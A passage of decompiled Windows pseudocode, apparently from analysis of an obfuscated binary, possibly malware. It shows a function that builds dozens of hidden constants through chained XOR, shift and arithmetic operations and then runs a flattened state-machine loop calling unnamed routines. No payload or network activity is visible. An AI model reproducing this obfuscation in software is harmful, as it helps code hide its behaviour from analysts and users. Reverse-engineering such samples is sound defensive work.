                                                                                                                                                                                                                    				signed int _v352;
                                                                                                                                                                                                                    				signed int _v356;
                                                                                                                                                                                                                    				signed int _v360;
                                                                                                                                                                                                                    				signed int _v364;
                                                                                                                                                                                                                    				signed int _v368;
                                                                                                                                                                                                                    				signed int _v372;
                                                                                                                                                                                                                    				signed int _v376;
                                                                                                                                                                                                                    				signed int _v380;
                                                                                                                                                                                                                    				signed int _v384;
                                                                                                                                                                                                                    				signed int _v388;
                                                                                                                                                                                                                    				signed int _v392;
                                                                                                                                                                                                                    				signed int _v396;
                                                                                                                                                                                                                    				signed int _v400;
                                                                                                                                                                                                                    				signed int _v404;
                                                                                                                                                                                                                    				signed int _v408;
                                                                                                                                                                                                                    				signed int _v412;
                                                                                                                                                                                                                    				signed int _v416;
                                                                                                                                                                                                                    				signed int _v420;
                                                                                                                                                                                                                    				signed int _v424;
                                                                                                                                                                                                                    				signed int _v428;
                                                                                                                                                                                                                    				signed int _v432;
                                                                                                                                                                                                                    				signed int _v436;
                                                                                                                                                                                                                    				signed int _v440;
                                                                                                                                                                                                                    				signed int _v444;
                                                                                                                                                                                                                    				signed int _v448;
                                                                                                                                                                                                                    				signed int _v452;
                                                                                                                                                                                                                    				signed int _v456;
                                                                                                                                                                                                                    				void* _t843;
                                                                                                                                                                                                                    				void* _t845;
                                                                                                                                                                                                                    				void* _t855;
                                                                                                                                                                                                                    				void* _t861;
                                                                                                                                                                                                                    				void* _t865;
                                                                                                                                                                                                                    				void* _t870;
                                                                                                                                                                                                                    				void* _t871;
                                                                                                                                                                                                                    				void* _t873;
                                                                                                                                                                                                                    				signed int _t880;
                                                                                                                                                                                                                    				signed int _t881;
                                                                                                                                                                                                                    				signed int _t882;
                                                                                                                                                                                                                    				signed int _t883;
                                                                                                                                                                                                                    				signed int _t884;
                                                                                                                                                                                                                    				signed int _t885;
                                                                                                                                                                                                                    				signed int _t886;
                                                                                                                                                                                                                    				signed int _t887;
                                                                                                                                                                                                                    				signed int _t888;
                                                                                                                                                                                                                    				signed int _t889;
                                                                                                                                                                                                                    				signed int _t890;
                                                                                                                                                                                                                    				signed int _t891;
                                                                                                                                                                                                                    				signed int _t892;
                                                                                                                                                                                                                    				signed int _t893;
                                                                                                                                                                                                                    				signed int _t894;
                                                                                                                                                                                                                    				signed int _t895;
                                                                                                                                                                                                                    				signed int _t896;
                                                                                                                                                                                                                    				signed int _t897;
                                                                                                                                                                                                                    				signed int _t898;
                                                                                                                                                                                                                    				void* _t903;
                                                                                                                                                                                                                    				void* _t977;
                                                                                                                                                                                                                    				intOrPtr* _t997;
                                                                                                                                                                                                                    				signed int _t999;
                                                                                                                                                                                                                    				void* _t1000;
                                                                                                                                                                                                                    				intOrPtr _t1004;
                                                                                                                                                                                                                    				void* _t1005;
                                                                                                                                                                                                                    				void* _t1013;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t997 = __ecx;
                                                                                                                                                                                                                    				_v104 = __ecx;
                                                                                                                                                                                                                    				_v92 = 0x93fae9;
                                                                                                                                                                                                                    				_v88 = 0x7be67b;
                                                                                                                                                                                                                    				_t1004 = 0;
                                                                                                                                                                                                                    				_t873 = 0xc149c0;
                                                                                                                                                                                                                    				_v84 = 0;
                                                                                                                                                                                                                    				_v80 = 0;
                                                                                                                                                                                                                    				_v420 = 0xcf58f4;
                                                                                                                                                                                                                    				_v420 = _v420 >> 0xc;
                                                                                                                                                                                                                    				_v420 = _v420 << 2;
                                                                                                                                                                                                                    				_v420 = _v420 ^ 0x280a91b8;
                                                                                                                                                                                                                    				_v420 = _v420 ^ 0x280aa26c;
                                                                                                                                                                                                                    				_v212 = 0x9d8287;
                                                                                                                                                                                                                    				_v212 = _v212 + 0x538e;
                                                                                                                                                                                                                    				_v212 = _v212 ^ 0x009dd615;
                                                                                                                                                                                                                    				_v144 = 0xf8493a;
                                                                                                                                                                                                                    				_v144 = _v144 | 0x33e1d954;
                                                                                                                                                                                                                    				_v144 = _v144 ^ 0x33f9d97e;
                                                                                                                                                                                                                    				_v376 = 0x3b1765;
                                                                                                                                                                                                                    				_v376 = _v376 + 0x707;
                                                                                                                                                                                                                    				_t880 = 0x26;
                                                                                                                                                                                                                    				_v376 = _v376 / _t880;
                                                                                                                                                                                                                    				_v376 = _v376 + 0xffff4d73;
                                                                                                                                                                                                                    				_v376 = _v376 ^ 0x0000dbb9;
                                                                                                                                                                                                                    				_v360 = 0x90ad96;
                                                                                                                                                                                                                    				_t881 = 0x5b;
                                                                                                                                                                                                                    				_v360 = _v360 / _t881;
                                                                                                                                                                                                                    				_v360 = _v360 >> 4;
                                                                                                                                                                                                                    				_v360 = _v360 >> 2;
                                                                                                                                                                                                                    				_v360 = _v360 ^ 0x0000065c;
                                                                                                                                                                                                                    				_v168 = 0xebcce9;
                                                                                                                                                                                                                    				_v168 = _v168 | 0x93ceeefb;
                                                                                                                                                                                                                    				_v168 = _v168 ^ 0x93efeefb;
                                                                                                                                                                                                                    				_v232 = 0xa7775;
                                                                                                                                                                                                                    				_v232 = _v232 | 0x77ac2e91;
                                                                                                                                                                                                                    				_v232 = _v232 + 0xffff9bc9;
                                                                                                                                                                                                                    				_v232 = _v232 ^ 0x77ae1bbe;
                                                                                                                                                                                                                    				_v312 = 0xaed266;
                                                                                                                                                                                                                    				_v312 = _v312 ^ 0x3cacb2a5;
                                                                                                                                                                                                                    				_v312 = _v312 + 0xffff049c;
                                                                                                                                                                                                                    				_v312 = _v312 ^ 0x3c01655f;
                                                                                                                                                                                                                    				_v172 = 0x311d8e;
                                                                                                                                                                                                                    				_v172 = _v172 + 0xfffffd40;
                                                                                                                                                                                                                    				_v172 = _v172 ^ 0x00311ace;
                                                                                                                                                                                                                    				_v352 = 0x1035b5;
                                                                                                                                                                                                                    				_v352 = _v352 + 0xffffb61c;
                                                                                                                                                                                                                    				_v352 = _v352 + 0xffffc229;
                                                                                                                                                                                                                    				_v352 = _v352 + 0xebe5;
                                                                                                                                                                                                                    				_v352 = _v352 ^ 0x001099df;
                                                                                                                                                                                                                    				_v216 = 0xf7155c;
                                                                                                                                                                                                                    				_v216 = _v216 + 0xffff78d3;
                                                                                                                                                                                                                    				_v216 = _v216 ^ 0x00f68e2f;
                                                                                                                                                                                                                    				_v228 = 0x43a44c;
                                                                                                                                                                                                                    				_v228 = _v228 | 0xfc7fbb16;
                                                                                                                                                                                                                    				_v228 = _v228 ^ 0xfc7fbf5e;
                                                                                                                                                                                                                    				_v444 = 0xf93a2d;
                                                                                                                                                                                                                    				_t882 = 3;
                                                                                                                                                                                                                    				_v444 = _v444 / _t882;
                                                                                                                                                                                                                    				_t883 = 0x16;
                                                                                                                                                                                                                    				_v444 = _v444 / _t883;
                                                                                                                                                                                                                    				_v444 = _v444 + 0xffff189d;
                                                                                                                                                                                                                    				_v444 = _v444 ^ 0x000602f3;
                                                                                                                                                                                                                    				_v276 = 0x7dad83;
                                                                                                                                                                                                                    				_v276 = _v276 + 0x20d7;
                                                                                                                                                                                                                    				_t999 = 0x18;
                                                                                                                                                                                                                    				_v276 = _v276 / _t999;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0x000cf7a1;
                                                                                                                                                                                                                    				_v284 = 0x7f182;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0xea1ff1c3;
                                                                                                                                                                                                                    				_v284 = _v284 + 0x1bef;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0xea1ad84b;
                                                                                                                                                                                                                    				_v292 = 0x600634;
                                                                                                                                                                                                                    				_v292 = _v292 >> 5;
                                                                                                                                                                                                                    				_v292 = _v292 + 0xffff6385;
                                                                                                                                                                                                                    				_v292 = _v292 ^ 0x000fae75;
                                                                                                                                                                                                                    				_v252 = 0xaabaa7;
                                                                                                                                                                                                                    				_v252 = _v252 >> 9;
                                                                                                                                                                                                                    				_v252 = _v252 | 0x6cc81325;
                                                                                                                                                                                                                    				_v252 = _v252 ^ 0x6cc35b70;
                                                                                                                                                                                                                    				_v436 = 0xf32e31;
                                                                                                                                                                                                                    				_v436 = _v436 >> 0xd;
                                                                                                                                                                                                                    				_v436 = _v436 + 0xfc71;
                                                                                                                                                                                                                    				_v436 = _v436 | 0x8e90c3f0;
                                                                                                                                                                                                                    				_v436 = _v436 ^ 0x8e9137dd;
                                                                                                                                                                                                                    				_v260 = 0xc58284;
                                                                                                                                                                                                                    				_v260 = _v260 * 0x53;
                                                                                                                                                                                                                    				_v260 = _v260 ^ 0x0e9b330d;
                                                                                                                                                                                                                    				_v260 = _v260 ^ 0x4e9764dd;
                                                                                                                                                                                                                    				_v268 = 0x6014f;
                                                                                                                                                                                                                    				_v268 = _v268 >> 0xa;
                                                                                                                                                                                                                    				_v268 = _v268 * 0x42;
                                                                                                                                                                                                                    				_v268 = _v268 ^ 0x00070ecb;
                                                                                                                                                                                                                    				_v404 = 0xd4c9f4;
                                                                                                                                                                                                                    				_v404 = _v404 ^ 0x03f3f493;
                                                                                                                                                                                                                    				_v404 = _v404 ^ 0x5b1221bb;
                                                                                                                                                                                                                    				_v404 = _v404 + 0x968a;
                                                                                                                                                                                                                    				_v404 = _v404 ^ 0x583fa5dc;
                                                                                                                                                                                                                    				_v412 = 0xb8e186;
                                                                                                                                                                                                                    				_v412 = _v412 * 0x76;
                                                                                                                                                                                                                    				_v412 = _v412 * 0x64;
                                                                                                                                                                                                                    				_v412 = _v412 ^ 0x17ac4723;
                                                                                                                                                                                                                    				_v412 = _v412 ^ 0x5e7aeb61;
                                                                                                                                                                                                                    				_v428 = 0xa83fb4;
                                                                                                                                                                                                                    				_v428 = _v428 | 0xdfabffb1;
                                                                                                                                                                                                                    				_v428 = _v428 / _t883;
                                                                                                                                                                                                                    				_v428 = _v428 ^ 0x0a222e15;
                                                                                                                                                                                                                    				_v388 = 0xcfa0c9;
                                                                                                                                                                                                                    				_v388 = _v388 + 0x9299;
                                                                                                                                                                                                                    				_v388 = _v388 + 0x7100;
                                                                                                                                                                                                                    				_v388 = _v388 | 0x1c3c46c5;
                                                                                                                                                                                                                    				_v388 = _v388 ^ 0x1cfd956b;
                                                                                                                                                                                                                    				_v208 = 0x75ab2e;
                                                                                                                                                                                                                    				_v208 = _v208 << 5;
                                                                                                                                                                                                                    				_v208 = _v208 ^ 0x0eb29588;
                                                                                                                                                                                                                    				_v396 = 0x641ebe;
                                                                                                                                                                                                                    				_v396 = _v396 / _t999;
                                                                                                                                                                                                                    				_v396 = _v396 << 0xb;
                                                                                                                                                                                                                    				_v396 = _v396 | 0x42af18c4;
                                                                                                                                                                                                                    				_v396 = _v396 ^ 0x63f04e16;
                                                                                                                                                                                                                    				_v244 = 0xfc3d52;
                                                                                                                                                                                                                    				_v244 = _v244 << 5;
                                                                                                                                                                                                                    				_v244 = _v244 * 0x76;
                                                                                                                                                                                                                    				_v244 = _v244 ^ 0x888f69e6;
                                                                                                                                                                                                                    				_v200 = 0x6ddd28;
                                                                                                                                                                                                                    				_t884 = 0x4a;
                                                                                                                                                                                                                    				_v200 = _v200 / _t884;
                                                                                                                                                                                                                    				_v200 = _v200 ^ 0x0009736f;
                                                                                                                                                                                                                    				_v380 = 0xab572d;
                                                                                                                                                                                                                    				_v380 = _v380 << 9;
                                                                                                                                                                                                                    				_v380 = _v380 | 0x7f9ff9bb;
                                                                                                                                                                                                                    				_v380 = _v380 ^ 0x7fb8c734;
                                                                                                                                                                                                                    				_v300 = 0x1450b8;
                                                                                                                                                                                                                    				_v300 = _v300 ^ 0xfc00c429;
                                                                                                                                                                                                                    				_v300 = _v300 ^ 0x9cbb203c;
                                                                                                                                                                                                                    				_v300 = _v300 ^ 0x60ae7c4b;
                                                                                                                                                                                                                    				_v308 = 0xbdb3e3;
                                                                                                                                                                                                                    				_v308 = _v308 ^ 0x858fbf54;
                                                                                                                                                                                                                    				_v308 = _v308 | 0x4f03d422;
                                                                                                                                                                                                                    				_v308 = _v308 ^ 0xcf3eaf75;
                                                                                                                                                                                                                    				_v316 = 0x21fcde;
                                                                                                                                                                                                                    				_v316 = _v316 >> 7;
                                                                                                                                                                                                                    				_v316 = _v316 + 0xffff40c8;
                                                                                                                                                                                                                    				_v316 = _v316 ^ 0xfffced43;
                                                                                                                                                                                                                    				_v328 = 0x44a059;
                                                                                                                                                                                                                    				_t885 = 0x2b;
                                                                                                                                                                                                                    				_v328 = _v328 / _t885;
                                                                                                                                                                                                                    				_v328 = _v328 | 0x9bc40902;
                                                                                                                                                                                                                    				_v328 = _v328 ^ 0x9bc14311;
                                                                                                                                                                                                                    				_v248 = 0x5e3406;
                                                                                                                                                                                                                    				_v248 = _v248 + 0x833f;
                                                                                                                                                                                                                    				_v248 = _v248 + 0xffff5590;
                                                                                                                                                                                                                    				_v248 = _v248 ^ 0x005c60f8;
                                                                                                                                                                                                                    				_v440 = 0xed7250;
                                                                                                                                                                                                                    				_t285 =  &_v440; // 0xed7250
                                                                                                                                                                                                                    				_t886 = 0xc;
                                                                                                                                                                                                                    				_v440 =  *_t285 / _t886;
                                                                                                                                                                                                                    				_v440 = _v440 | 0x53ab54ef;
                                                                                                                                                                                                                    				_v440 = _v440 ^ 0x53b6f56e;
                                                                                                                                                                                                                    				_v424 = 0x67d2d8;
                                                                                                                                                                                                                    				_v424 = _v424 ^ 0x6c216d34;
                                                                                                                                                                                                                    				_v424 = _v424 | 0x413f7529;
                                                                                                                                                                                                                    				_v424 = _v424 + 0x8ad3;
                                                                                                                                                                                                                    				_v424 = _v424 ^ 0x6d8e8b21;
                                                                                                                                                                                                                    				_v368 = 0xb7b905;
                                                                                                                                                                                                                    				_v368 = _v368 ^ 0x630e43af;
                                                                                                                                                                                                                    				_v368 = _v368 >> 7;
                                                                                                                                                                                                                    				_t887 = 0x7c;
                                                                                                                                                                                                                    				_v368 = _v368 / _t887;
                                                                                                                                                                                                                    				_v368 = _v368 ^ 0x00093c43;
                                                                                                                                                                                                                    				_v432 = 0x6c4183;
                                                                                                                                                                                                                    				_v432 = _v432 | 0xd54711e3;
                                                                                                                                                                                                                    				_v432 = _v432 ^ 0x84c572fe;
                                                                                                                                                                                                                    				_v432 = _v432 | 0x2e6e57a7;
                                                                                                                                                                                                                    				_v432 = _v432 ^ 0x7fef816f;
                                                                                                                                                                                                                    				_v392 = 0x8bae32;
                                                                                                                                                                                                                    				_v392 = _v392 ^ 0x53bb739b;
                                                                                                                                                                                                                    				_t888 = 0x2f;
                                                                                                                                                                                                                    				_v392 = _v392 / _t888;
                                                                                                                                                                                                                    				_v392 = _v392 ^ 0x3632543d;
                                                                                                                                                                                                                    				_v392 = _v392 ^ 0x37f69e73;
                                                                                                                                                                                                                    				_v156 = 0x8c3442;
                                                                                                                                                                                                                    				_v156 = _v156 | 0x3cd45504;
                                                                                                                                                                                                                    				_v156 = _v156 ^ 0x3cd99d5b;
                                                                                                                                                                                                                    				_v320 = 0x8757cc;
                                                                                                                                                                                                                    				_v320 = _v320 >> 1;
                                                                                                                                                                                                                    				_t889 = 0x74;
                                                                                                                                                                                                                    				_v320 = _v320 / _t889;
                                                                                                                                                                                                                    				_v320 = _v320 ^ 0x000a579e;
                                                                                                                                                                                                                    				_v196 = 0x30a2c7;
                                                                                                                                                                                                                    				_v196 = _v196 ^ 0x7e507d8e;
                                                                                                                                                                                                                    				_v196 = _v196 ^ 0x7e6d47b6;
                                                                                                                                                                                                                    				_v272 = 0x4081c6;
                                                                                                                                                                                                                    				_v272 = _v272 << 0xc;
                                                                                                                                                                                                                    				_t890 = 0x29;
                                                                                                                                                                                                                    				_v272 = _v272 / _t890;
                                                                                                                                                                                                                    				_v272 = _v272 ^ 0x003455de;
                                                                                                                                                                                                                    				_v164 = 0x8b77e7;
                                                                                                                                                                                                                    				_v164 = _v164 + 0xffffc81f;
                                                                                                                                                                                                                    				_v164 = _v164 ^ 0x008a0b43;
                                                                                                                                                                                                                    				_v204 = 0x898a65;
                                                                                                                                                                                                                    				_v204 = _v204 >> 4;
                                                                                                                                                                                                                    				_v204 = _v204 ^ 0x000e6d06;
                                                                                                                                                                                                                    				_v296 = 0xb3b58b;
                                                                                                                                                                                                                    				_t891 = 0x70;
                                                                                                                                                                                                                    				_v296 = _v296 * 0x7d;
                                                                                                                                                                                                                    				_v296 = _v296 + 0xa691;
                                                                                                                                                                                                                    				_v296 = _v296 ^ 0x57cce5f7;
                                                                                                                                                                                                                    				_v240 = 0xa41512;
                                                                                                                                                                                                                    				_v240 = _v240 * 0x49;
                                                                                                                                                                                                                    				_v240 = _v240 / _t891;
                                                                                                                                                                                                                    				_v240 = _v240 ^ 0x00636e14;
                                                                                                                                                                                                                    				_v304 = 0xb68518;
                                                                                                                                                                                                                    				_v304 = _v304 + 0x9e72;
                                                                                                                                                                                                                    				_v304 = _v304 | 0x325cfb4f;
                                                                                                                                                                                                                    				_v304 = _v304 ^ 0x32f20515;
                                                                                                                                                                                                                    				_v264 = 0xf01b5b;
                                                                                                                                                                                                                    				_v264 = _v264 >> 9;
                                                                                                                                                                                                                    				_t892 = 0x6c;
                                                                                                                                                                                                                    				_v264 = _v264 / _t892;
                                                                                                                                                                                                                    				_v264 = _v264 ^ 0x000660bb;
                                                                                                                                                                                                                    				_v384 = 0xac8a55;
                                                                                                                                                                                                                    				_v384 = _v384 + 0xffffb2b7;
                                                                                                                                                                                                                    				_v384 = _v384 << 5;
                                                                                                                                                                                                                    				_v384 = _v384 * 9;
                                                                                                                                                                                                                    				_v384 = _v384 ^ 0xc1c874c4;
                                                                                                                                                                                                                    				_v256 = 0xe1a8a8;
                                                                                                                                                                                                                    				_v256 = _v256 + 0xfffff34d;
                                                                                                                                                                                                                    				_v256 = _v256 ^ 0xb97c963d;
                                                                                                                                                                                                                    				_v256 = _v256 ^ 0xb9937ee9;
                                                                                                                                                                                                                    				_v188 = 0x857331;
                                                                                                                                                                                                                    				_v188 = _v188 | 0x22d0adf0;
                                                                                                                                                                                                                    				_v188 = _v188 ^ 0x22de1486;
                                                                                                                                                                                                                    				_v416 = 0x723e7b;
                                                                                                                                                                                                                    				_v416 = _v416 >> 3;
                                                                                                                                                                                                                    				_v416 = _v416 | 0x406706e3;
                                                                                                                                                                                                                    				_v416 = _v416 ^ 0x0b0d5385;
                                                                                                                                                                                                                    				_v416 = _v416 ^ 0x4b66f5f1;
                                                                                                                                                                                                                    				_v288 = 0x119253;
                                                                                                                                                                                                                    				_v288 = _v288 + 0x2ae;
                                                                                                                                                                                                                    				_v288 = _v288 * 0x55;
                                                                                                                                                                                                                    				_v288 = _v288 ^ 0x05dd1966;
                                                                                                                                                                                                                    				_v180 = 0xb2a8df;
                                                                                                                                                                                                                    				_v180 = _v180 + 0xffff24b7;
                                                                                                                                                                                                                    				_v180 = _v180 ^ 0x00be29b6;
                                                                                                                                                                                                                    				_v148 = 0x3ee001;
                                                                                                                                                                                                                    				_v148 = _v148 >> 2;
                                                                                                                                                                                                                    				_v148 = _v148 ^ 0x0008e50c;
                                                                                                                                                                                                                    				_v136 = 0xa8a4f2;
                                                                                                                                                                                                                    				_v136 = _v136 << 4;
                                                                                                                                                                                                                    				_v136 = _v136 ^ 0x0a82fd99;
                                                                                                                                                                                                                    				_v132 = 0xe08bbe;
                                                                                                                                                                                                                    				_v132 = _v132 + 0xffff791d;
                                                                                                                                                                                                                    				_v132 = _v132 ^ 0x00eaf79f;
                                                                                                                                                                                                                    				_v332 = 0x8dc4d;
                                                                                                                                                                                                                    				_t893 = 0x79;
                                                                                                                                                                                                                    				_v332 = _v332 * 0x5b;
                                                                                                                                                                                                                    				_v332 = _v332 * 0x72;
                                                                                                                                                                                                                    				_v332 = _v332 ^ 0x67051234;
                                                                                                                                                                                                                    				_v340 = 0xba1acb;
                                                                                                                                                                                                                    				_v340 = _v340 + 0x9962;
                                                                                                                                                                                                                    				_v340 = _v340 * 0x4f;
                                                                                                                                                                                                                    				_v340 = _v340 ^ 0x39967ee6;
                                                                                                                                                                                                                    				_v280 = 0xcef18b;
                                                                                                                                                                                                                    				_v280 = _v280 + 0xc657;
                                                                                                                                                                                                                    				_v280 = _v280 >> 0x10;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x00033889;
                                                                                                                                                                                                                    				_v224 = 0x5d147e;
                                                                                                                                                                                                                    				_v224 = _v224 >> 5;
                                                                                                                                                                                                                    				_v224 = _v224 + 0xffffb85c;
                                                                                                                                                                                                                    				_v224 = _v224 ^ 0x000b9c67;
                                                                                                                                                                                                                    				_v140 = 0x351849;
                                                                                                                                                                                                                    				_v140 = _v140 + 0x2aa8;
                                                                                                                                                                                                                    				_v140 = _v140 ^ 0x0032564d;
                                                                                                                                                                                                                    				_v408 = 0x17f640;
                                                                                                                                                                                                                    				_v408 = _v408 + 0xffffe6c7;
                                                                                                                                                                                                                    				_v408 = _v408 >> 0xf;
                                                                                                                                                                                                                    				_v408 = _v408 | 0xb2a0b779;
                                                                                                                                                                                                                    				_v408 = _v408 ^ 0xb2a8e5f3;
                                                                                                                                                                                                                    				_v344 = 0x140610;
                                                                                                                                                                                                                    				_v344 = _v344 + 0x799c;
                                                                                                                                                                                                                    				_v344 = _v344 / _t893;
                                                                                                                                                                                                                    				_v344 = _v344 ^ 0x000d2837;
                                                                                                                                                                                                                    				_v160 = 0x369805;
                                                                                                                                                                                                                    				_v160 = _v160 + 0x1197;
                                                                                                                                                                                                                    				_v160 = _v160 ^ 0x003f3a22;
                                                                                                                                                                                                                    				_v336 = 0x58af9b;
                                                                                                                                                                                                                    				_t894 = 0x5a;
                                                                                                                                                                                                                    				_v336 = _v336 / _t894;
                                                                                                                                                                                                                    				_v336 = _v336 ^ 0x677187f6;
                                                                                                                                                                                                                    				_v336 = _v336 ^ 0x677fb329;
                                                                                                                                                                                                                    				_v324 = 0x9c5aac;
                                                                                                                                                                                                                    				_v324 = _v324 ^ 0x5aa28069;
                                                                                                                                                                                                                    				_v324 = _v324 << 0xc;
                                                                                                                                                                                                                    				_v324 = _v324 ^ 0xedafe588;
                                                                                                                                                                                                                    				_v448 = 0x466cd8;
                                                                                                                                                                                                                    				_t895 = 9;
                                                                                                                                                                                                                    				_v448 = _v448 / _t895;
                                                                                                                                                                                                                    				_t896 = 0x60;
                                                                                                                                                                                                                    				_v448 = _v448 / _t896;
                                                                                                                                                                                                                    				_v448 = _v448 << 2;
                                                                                                                                                                                                                    				_v448 = _v448 ^ 0x0008f638;
                                                                                                                                                                                                                    				_v400 = 0x67b917;
                                                                                                                                                                                                                    				_v400 = _v400 * 0x5c;
                                                                                                                                                                                                                    				_v400 = _v400 | 0xe9fbef7a;
                                                                                                                                                                                                                    				_v400 = _v400 ^ 0xedf78cb2;
                                                                                                                                                                                                                    				_v192 = 0xb5a2da;
                                                                                                                                                                                                                    				_v192 = _v192 * 0x14;
                                                                                                                                                                                                                    				_v192 = _v192 ^ 0x0e36cd79;
                                                                                                                                                                                                                    				_v372 = 0x888450;
                                                                                                                                                                                                                    				_v372 = _v372 ^ 0x362bfe92;
                                                                                                                                                                                                                    				_v372 = _v372 ^ 0x632c57aa;
                                                                                                                                                                                                                    				_t1000 = 0xcf09e4;
                                                                                                                                                                                                                    				_v372 = _v372 + 0xffff24ab;
                                                                                                                                                                                                                    				_v372 = _v372 ^ 0x558f787b;
                                                                                                                                                                                                                    				_v152 = 0xa69fa0;
                                                                                                                                                                                                                    				_v152 = _v152 + 0x1314;
                                                                                                                                                                                                                    				_v152 = _v152 ^ 0x00a6a1ab;
                                                                                                                                                                                                                    				_v452 = 0x8a0b5a;
                                                                                                                                                                                                                    				_v452 = _v452 | 0xd49d1625;
                                                                                                                                                                                                                    				_v452 = _v452 + 0x4299;
                                                                                                                                                                                                                    				_v452 = _v452 | 0x314479f4;
                                                                                                                                                                                                                    				_v452 = _v452 ^ 0xf5df5d33;
                                                                                                                                                                                                                    				_v456 = 0x1bc46;
                                                                                                                                                                                                                    				_v456 = _v456 + 0x2d18;
                                                                                                                                                                                                                    				_t897 = 0xa;
                                                                                                                                                                                                                    				_v456 = _v456 / _t897;
                                                                                                                                                                                                                    				_v456 = _v456 ^ 0x3601fa65;
                                                                                                                                                                                                                    				_v456 = _v456 ^ 0x3600a97d;
                                                                                                                                                                                                                    				_v356 = 0x610781;
                                                                                                                                                                                                                    				_v356 = _v356 << 2;
                                                                                                                                                                                                                    				_t898 = 0x71;
                                                                                                                                                                                                                    				_v108 = 0x48;
                                                                                                                                                                                                                    				_v96 = 0xc69cff5;
                                                                                                                                                                                                                    				_v100 = 0x100;
                                                                                                                                                                                                                    				_v356 = _v356 * 0x67;
                                                                                                                                                                                                                    				_v356 = _v356 >> 5;
                                                                                                                                                                                                                    				_v356 = _v356 ^ 0x04e8d056;
                                                                                                                                                                                                                    				_v236 = 0x461cc3;
                                                                                                                                                                                                                    				_v236 = _v236 / _t898;
                                                                                                                                                                                                                    				_v236 = _v236 + 0xffffedb6;
                                                                                                                                                                                                                    				_v236 = _v236 ^ 0x00063905;
                                                                                                                                                                                                                    				_v364 = 0x90ecff;
                                                                                                                                                                                                                    				_v364 = _v364 + 0xb58c;
                                                                                                                                                                                                                    				_v364 = _v364 * 0x70;
                                                                                                                                                                                                                    				_v364 = _v364 ^ 0x5f07fb36;
                                                                                                                                                                                                                    				_v364 = _v364 ^ 0x60b54283;
                                                                                                                                                                                                                    				_v220 = 0xb9920d;
                                                                                                                                                                                                                    				_v220 = _v220 | 0xaa94399f;
                                                                                                                                                                                                                    				_v220 = _v220 << 8;
                                                                                                                                                                                                                    				_v220 = _v220 ^ 0xbdb76edd;
                                                                                                                                                                                                                    				_v348 = 0x497168;
                                                                                                                                                                                                                    				_v348 = _v348 * 0x1e;
                                                                                                                                                                                                                    				_v348 = _v348 >> 1;
                                                                                                                                                                                                                    				_v348 = _v348 >> 0xa;
                                                                                                                                                                                                                    				_v348 = _v348 ^ 0x0003b010;
                                                                                                                                                                                                                    				_v176 = 0x2b747a;
                                                                                                                                                                                                                    				_v176 = _v176 << 3;
                                                                                                                                                                                                                    				_v176 = _v176 ^ 0x015fbb8b;
                                                                                                                                                                                                                    				_v184 = 0x2af16f;
                                                                                                                                                                                                                    				_v184 = _v184 | 0x387ea7c7;
                                                                                                                                                                                                                    				_v184 = _v184 ^ 0x387036c4;
                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                    					L1:
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                                    							_t977 = 0x37f5389;
                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                    									L4:
                                                                                                                                                                                                                    									_t1013 = _t873 - 0x573d36d;
                                                                                                                                                                                                                    									if(_t1013 > 0) {
                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									if(_t1013 == 0) {
                                                                                                                                                                                                                    										_push(_v148);
                                                                                                                                                                                                                    										_push(_v180);
                                                                                                                                                                                                                    										_push(_v288);
                                                                                                                                                                                                                    										__eflags = E00A69EA6( *((intOrPtr*)(_t997 + 4)), _v136, 0xa6144c, _v132, _v124,  &_v116, _v332,  *_t997, _v340, _v280, _v172, _v224, E00A81E60(0xa6144c, _v416, __eflags), _v140) - _v352;
                                                                                                                                                                                                                    										_t873 =  ==  ? 0x37f5389 : 0x59a9af2;
                                                                                                                                                                                                                    										E00A7D6DF(_v408, _t856, _v344, _v160);
                                                                                                                                                                                                                    										_t1005 = _t1005 + 0x44;
                                                                                                                                                                                                                    										L23:
                                                                                                                                                                                                                    										_t1000 = 0xcf09e4;
                                                                                                                                                                                                                    										L35:
                                                                                                                                                                                                                    										_t977 = 0x37f5389;
                                                                                                                                                                                                                    										_t903 = 0x1443a63;
                                                                                                                                                                                                                    										_t843 = 0x1044b62;
                                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									if(_t873 == 0xc149c0) {
                                                                                                                                                                                                                    										_t873 = 0xa4ba762;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									if(_t873 == _t1000) {
                                                                                                                                                                                                                    										_t861 = E00A67990(_v112);
                                                                                                                                                                                                                    										_t873 = 0x8589966;
                                                                                                                                                                                                                    										__eflags = _t861;
                                                                                                                                                                                                                    										_t1004 =  !=  ? 1 : _t1004;
                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                    											L1:
                                                                                                                                                                                                                    											L2:
                                                                                                                                                                                                                    											L3:
                                                                                                                                                                                                                    											_t977 = 0x37f5389;
                                                                                                                                                                                                                    											goto L4;
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									if(_t873 == _t843) {
                                                                                                                                                                                                                    										_push(_v392);
                                                                                                                                                                                                                    										_push(_v432);
                                                                                                                                                                                                                    										_push(_v368);
                                                                                                                                                                                                                    										_t1002 = E00A81E60(0xa6144c, _v424, __eflags);
                                                                                                                                                                                                                    										_v120 = _v108;
                                                                                                                                                                                                                    										_t865 = E00A62AFD(_v156, _v108,  &_v76, _v232, _v320, _v196, _v272, _v164, _v128,  &_v120, _v204, _v108, _t862);
                                                                                                                                                                                                                    										_t1005 = _t1005 + 0x38;
                                                                                                                                                                                                                    										__eflags = _t865 - _v312;
                                                                                                                                                                                                                    										if(_t865 != _v312) {
                                                                                                                                                                                                                    											_t873 = 0x59a9af2;
                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                    											E00A7056B( &_v68, _v296,  *0xa83208 + 0x10, 0x40, _v240, _v304, _v264);
                                                                                                                                                                                                                    											_t1005 = _t1005 + 0x14;
                                                                                                                                                                                                                    											_t873 = 0x573d36d;
                                                                                                                                                                                                                    										}
